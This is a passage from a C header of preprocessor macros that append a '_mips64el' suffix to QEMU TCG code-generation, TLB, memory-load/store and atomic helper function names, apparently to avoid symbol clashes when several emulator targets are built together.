tcg_gen_rotri_i64_mips64el #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_mips64el #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_mips64el #define tcg_gen_extract_i64 tcg_gen_extract_i64_mips64el #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_mips64el #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_mips64el #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mips64el #define tcg_gen_add2_i64 tcg_gen_add2_i64_mips64el #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_mips64el #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_mips64el #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_mips64el #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_mips64el #define tcg_gen_smin_i64 tcg_gen_smin_i64_mips64el #define tcg_gen_umin_i64 tcg_gen_umin_i64_mips64el #define tcg_gen_smax_i64 tcg_gen_smax_i64_mips64el #define tcg_gen_umax_i64 tcg_gen_umax_i64_mips64el #define tcg_gen_abs_i64 tcg_gen_abs_i64_mips64el #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_mips64el #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_mips64el #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mips64el #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mips64el #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mips64el #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_mips64el #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_mips64el #define tcg_gen_exit_tb tcg_gen_exit_tb_mips64el #define tcg_gen_goto_tb tcg_gen_goto_tb_mips64el #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_mips64el #define check_exit_request check_exit_request_mips64el #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mips64el #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mips64el #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mips64el #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mips64el #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_mips64el #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_mips64el #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_mips64el #define 
tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_mips64el #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_mips64el #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_mips64el #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_mips64el #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_mips64el #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_mips64el #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_mips64el #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_mips64el #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_mips64el #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_mips64el #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_mips64el #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_mips64el #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_mips64el #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_mips64el #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_mips64el #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_mips64el #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_mips64el #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_mips64el #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_mips64el #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_mips64el #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_mips64el #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_mips64el #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_mips64el #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_mips64el #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_mips64el #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_mips64el #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_mips64el #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_mips64el #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_mips64el #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_mips64el #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_mips64el #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_mips64el #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_mips64el #define simd_desc simd_desc_mips64el #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_mips64el #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_mips64el #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_mips64el #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_mips64el #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_mips64el #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_mips64el #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_mips64el #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_mips64el #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_mips64el #define tcg_gen_gvec_2 tcg_gen_gvec_2_mips64el #define tcg_gen_gvec_2i tcg_gen_gvec_2i_mips64el #define tcg_gen_gvec_2s tcg_gen_gvec_2s_mips64el #define tcg_gen_gvec_3 tcg_gen_gvec_3_mips64el #define tcg_gen_gvec_3i tcg_gen_gvec_3i_mips64el #define tcg_gen_gvec_4 tcg_gen_gvec_4_mips64el #define tcg_gen_gvec_mov tcg_gen_gvec_mov_mips64el #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_mips64el #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_mips64el #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_mips64el #define tcg_gen_gvec_dup64i 
tcg_gen_gvec_dup64i_mips64el #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_mips64el #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_mips64el #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_mips64el #define tcg_gen_gvec_not tcg_gen_gvec_not_mips64el #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_mips64el #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_mips64el #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_mips64el #define tcg_gen_gvec_add tcg_gen_gvec_add_mips64el #define tcg_gen_gvec_adds tcg_gen_gvec_adds_mips64el #define tcg_gen_gvec_addi tcg_gen_gvec_addi_mips64el #define tcg_gen_gvec_subs tcg_gen_gvec_subs_mips64el #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_mips64el #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_mips64el #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_mips64el #define tcg_gen_gvec_sub tcg_gen_gvec_sub_mips64el #define tcg_gen_gvec_mul tcg_gen_gvec_mul_mips64el #define tcg_gen_gvec_muls tcg_gen_gvec_muls_mips64el #define tcg_gen_gvec_muli tcg_gen_gvec_muli_mips64el #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_mips64el #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_mips64el #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_mips64el #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_mips64el #define tcg_gen_gvec_smin tcg_gen_gvec_smin_mips64el #define tcg_gen_gvec_umin tcg_gen_gvec_umin_mips64el #define tcg_gen_gvec_smax tcg_gen_gvec_smax_mips64el #define tcg_gen_gvec_umax tcg_gen_gvec_umax_mips64el #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_mips64el #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_mips64el #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_mips64el #define tcg_gen_gvec_neg tcg_gen_gvec_neg_mips64el #define tcg_gen_gvec_abs tcg_gen_gvec_abs_mips64el #define tcg_gen_gvec_and tcg_gen_gvec_and_mips64el #define tcg_gen_gvec_or tcg_gen_gvec_or_mips64el #define tcg_gen_gvec_xor tcg_gen_gvec_xor_mips64el #define tcg_gen_gvec_andc tcg_gen_gvec_andc_mips64el #define tcg_gen_gvec_orc tcg_gen_gvec_orc_mips64el #define tcg_gen_gvec_nand tcg_gen_gvec_nand_mips64el #define tcg_gen_gvec_nor tcg_gen_gvec_nor_mips64el #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_mips64el #define tcg_gen_gvec_ands tcg_gen_gvec_ands_mips64el #define tcg_gen_gvec_andi tcg_gen_gvec_andi_mips64el #define tcg_gen_gvec_xors tcg_gen_gvec_xors_mips64el #define tcg_gen_gvec_xori tcg_gen_gvec_xori_mips64el #define tcg_gen_gvec_ors tcg_gen_gvec_ors_mips64el #define tcg_gen_gvec_ori tcg_gen_gvec_ori_mips64el #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_mips64el #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_mips64el #define tcg_gen_gvec_shli tcg_gen_gvec_shli_mips64el #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_mips64el #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_mips64el #define tcg_gen_gvec_shri tcg_gen_gvec_shri_mips64el #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_mips64el #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_mips64el #define tcg_gen_gvec_sari tcg_gen_gvec_sari_mips64el #define tcg_gen_gvec_shls tcg_gen_gvec_shls_mips64el #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_mips64el #define tcg_gen_gvec_sars tcg_gen_gvec_sars_mips64el #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_mips64el #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_mips64el #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_mips64el #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_mips64el #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_mips64el #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_mips64el #define vec_gen_2 vec_gen_2_mips64el #define vec_gen_3 
vec_gen_3_mips64el #define vec_gen_4 vec_gen_4_mips64el #define tcg_gen_mov_vec tcg_gen_mov_vec_mips64el #define tcg_const_zeros_vec tcg_const_zeros_vec_mips64el #define tcg_const_ones_vec tcg_const_ones_vec_mips64el #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_mips64el #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_mips64el #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_mips64el #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_mips64el #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_mips64el #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_mips64el #define tcg_gen_dupi_vec tcg_gen_dupi_vec_mips64el #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_mips64el #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_mips64el #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_mips64el #define tcg_gen_ld_vec tcg_gen_ld_vec_mips64el #define tcg_gen_st_vec tcg_gen_st_vec_mips64el #define tcg_gen_stl_vec tcg_gen_stl_vec_mips64el #define tcg_gen_and_vec tcg_gen_and_vec_mips64el #define tcg_gen_or_vec tcg_gen_or_vec_mips64el #define tcg_gen_xor_vec tcg_gen_xor_vec_mips64el #define tcg_gen_andc_vec tcg_gen_andc_vec_mips64el #define tcg_gen_orc_vec tcg_gen_orc_vec_mips64el #define tcg_gen_nand_vec tcg_gen_nand_vec_mips64el #define tcg_gen_nor_vec tcg_gen_nor_vec_mips64el #define tcg_gen_eqv_vec tcg_gen_eqv_vec_mips64el #define tcg_gen_not_vec tcg_gen_not_vec_mips64el #define tcg_gen_neg_vec tcg_gen_neg_vec_mips64el #define tcg_gen_abs_vec tcg_gen_abs_vec_mips64el #define tcg_gen_shli_vec tcg_gen_shli_vec_mips64el #define tcg_gen_shri_vec tcg_gen_shri_vec_mips64el #define tcg_gen_sari_vec tcg_gen_sari_vec_mips64el #define tcg_gen_cmp_vec tcg_gen_cmp_vec_mips64el #define tcg_gen_add_vec tcg_gen_add_vec_mips64el #define tcg_gen_sub_vec tcg_gen_sub_vec_mips64el #define tcg_gen_mul_vec tcg_gen_mul_vec_mips64el #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_mips64el #define tcg_gen_usadd_vec tcg_gen_usadd_vec_mips64el #define tcg_gen_sssub_vec tcg_gen_sssub_vec_mips64el #define tcg_gen_ussub_vec tcg_gen_ussub_vec_mips64el #define tcg_gen_smin_vec tcg_gen_smin_vec_mips64el #define tcg_gen_umin_vec tcg_gen_umin_vec_mips64el #define tcg_gen_smax_vec tcg_gen_smax_vec_mips64el #define tcg_gen_umax_vec tcg_gen_umax_vec_mips64el #define tcg_gen_shlv_vec tcg_gen_shlv_vec_mips64el #define tcg_gen_shrv_vec tcg_gen_shrv_vec_mips64el #define tcg_gen_sarv_vec tcg_gen_sarv_vec_mips64el #define tcg_gen_shls_vec tcg_gen_shls_vec_mips64el #define tcg_gen_shrs_vec tcg_gen_shrs_vec_mips64el #define tcg_gen_sars_vec tcg_gen_sars_vec_mips64el #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_mips64el #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_mips64el #define tb_htable_lookup tb_htable_lookup_mips64el #define tb_set_jmp_target tb_set_jmp_target_mips64el #define cpu_exec cpu_exec_mips64el #define cpu_loop_exit_noexc cpu_loop_exit_noexc_mips64el #define cpu_reloading_memory_map cpu_reloading_memory_map_mips64el #define cpu_loop_exit cpu_loop_exit_mips64el #define cpu_loop_exit_restore cpu_loop_exit_restore_mips64el #define cpu_loop_exit_atomic cpu_loop_exit_atomic_mips64el #define tlb_init tlb_init_mips64el #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_mips64el #define tlb_flush tlb_flush_mips64el #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_mips64el #define tlb_flush_all_cpus tlb_flush_all_cpus_mips64el #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_mips64el #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_mips64el #define tlb_flush_page_by_mmuidx 
tlb_flush_page_by_mmuidx_mips64el #define tlb_flush_page tlb_flush_page_mips64el #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_mips64el #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_mips64el #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_mips64el #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_mips64el #define tlb_protect_code tlb_protect_code_mips64el #define tlb_unprotect_code tlb_unprotect_code_mips64el #define tlb_reset_dirty tlb_reset_dirty_mips64el #define tlb_set_dirty tlb_set_dirty_mips64el #define tlb_set_page_with_attrs tlb_set_page_with_attrs_mips64el #define tlb_set_page tlb_set_page_mips64el #define get_page_addr_code_hostp get_page_addr_code_hostp_mips64el #define get_page_addr_code get_page_addr_code_mips64el #define probe_access probe_access_mips64el #define tlb_vaddr_to_host tlb_vaddr_to_host_mips64el #define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips64el #define helper_le_lduw_mmu helper_le_lduw_mmu_mips64el #define helper_be_lduw_mmu helper_be_lduw_mmu_mips64el #define helper_le_ldul_mmu helper_le_ldul_mmu_mips64el #define helper_be_ldul_mmu helper_be_ldul_mmu_mips64el #define helper_le_ldq_mmu helper_le_ldq_mmu_mips64el #define helper_be_ldq_mmu helper_be_ldq_mmu_mips64el #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips64el #define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips64el #define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips64el #define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips64el #define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips64el #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_mips64el #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_mips64el #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_mips64el #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_mips64el #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_mips64el #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_mips64el #define cpu_ldub_data_ra cpu_ldub_data_ra_mips64el #define cpu_ldsb_data_ra cpu_ldsb_data_ra_mips64el #define cpu_lduw_data_ra cpu_lduw_data_ra_mips64el #define cpu_ldsw_data_ra cpu_ldsw_data_ra_mips64el #define cpu_ldl_data_ra cpu_ldl_data_ra_mips64el #define cpu_ldq_data_ra cpu_ldq_data_ra_mips64el #define cpu_ldub_data cpu_ldub_data_mips64el #define cpu_ldsb_data cpu_ldsb_data_mips64el #define cpu_lduw_data cpu_lduw_data_mips64el #define cpu_ldsw_data cpu_ldsw_data_mips64el #define cpu_ldl_data cpu_ldl_data_mips64el #define cpu_ldq_data cpu_ldq_data_mips64el #define helper_ret_stb_mmu helper_ret_stb_mmu_mips64el #define helper_le_stw_mmu helper_le_stw_mmu_mips64el #define helper_be_stw_mmu helper_be_stw_mmu_mips64el #define helper_le_stl_mmu helper_le_stl_mmu_mips64el #define helper_be_stl_mmu helper_be_stl_mmu_mips64el #define helper_le_stq_mmu helper_le_stq_mmu_mips64el #define helper_be_stq_mmu helper_be_stq_mmu_mips64el #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_mips64el #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_mips64el #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_mips64el #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_mips64el #define cpu_stb_data_ra cpu_stb_data_ra_mips64el #define cpu_stw_data_ra cpu_stw_data_ra_mips64el #define cpu_stl_data_ra cpu_stl_data_ra_mips64el #define cpu_stq_data_ra cpu_stq_data_ra_mips64el #define cpu_stb_data cpu_stb_data_mips64el #define cpu_stw_data cpu_stw_data_mips64el #define cpu_stl_data cpu_stl_data_mips64el #define cpu_stq_data cpu_stq_data_mips64el #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_mips64el #define helper_atomic_xchgb_mmu 
helper_atomic_xchgb_mmu_mips64el #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_mips64el #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_mips64el #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_mips64el #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_mips64el #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_mips64el #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_mips64el #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_mips64el #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_mips64el #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_mips64el #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_mips64el #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_mips64el #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_mips64el #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_mips64el #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_mips64el #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_mips64el #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_mips64el #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_mips64el #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_mips64el #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_mips64el #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_mips64el #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_mips64el #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_mips64el #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_mips64el #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_mips64el #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_mips64el #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_mips64el #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_mips64el #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_mips64el #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_mips64el #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_mips64el #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_mips64el #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_mips64el #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_mips64el #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_mips64el #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_mips64el #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_mips64el #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_mips64el #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_mips64el #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_mips64el #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_mips64el #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_mips64el #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_mips64el #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_mips64el #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_mips64el #define helper_atomic_fetch_smaxw_be_mmu 
helper_atomic_fetch_smaxw_be_mmu_mips64el #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_mips64el #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_mips64el #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_mips64el #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_mips64el #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_mips64el #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_mips64el #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_mips64el #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_mips64el #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_mips64el #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_mips64el #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_mips64el #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_mips64el #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_mips64el #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_mips64el #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_mips64el #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_mips64el #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_mips64el #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_mips64el #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_mips64el #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_mips64el #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_mips64el #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_mips64el #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_mips64el #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_mips64el #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_mips64el #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_mips64el #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_mips64el #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_mips64el #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_mips64el #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_mips64el #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_mips64el #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_mips64el #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_mips64el #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_mips64el #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_mips64el #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_mips64el #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_mips64el #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_mips64el #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_mips64el #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_mips64el #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_mips64el #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_mips64el #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_mips64el #define 
helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_mips64el #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_mips64el #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_mips64el #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_mips64el #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_mips64el #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_mips64el #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_mips64el #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_mips64el #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_mips64el #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_mips64el #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_mips64el #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_mips64el #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_mips64el #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_mips64el #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_mips64el #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_mips64el #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_mips64el #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_mips64el #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_mips64el #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_mips64el #define helper_atomic_fetch_andq_be_mmu 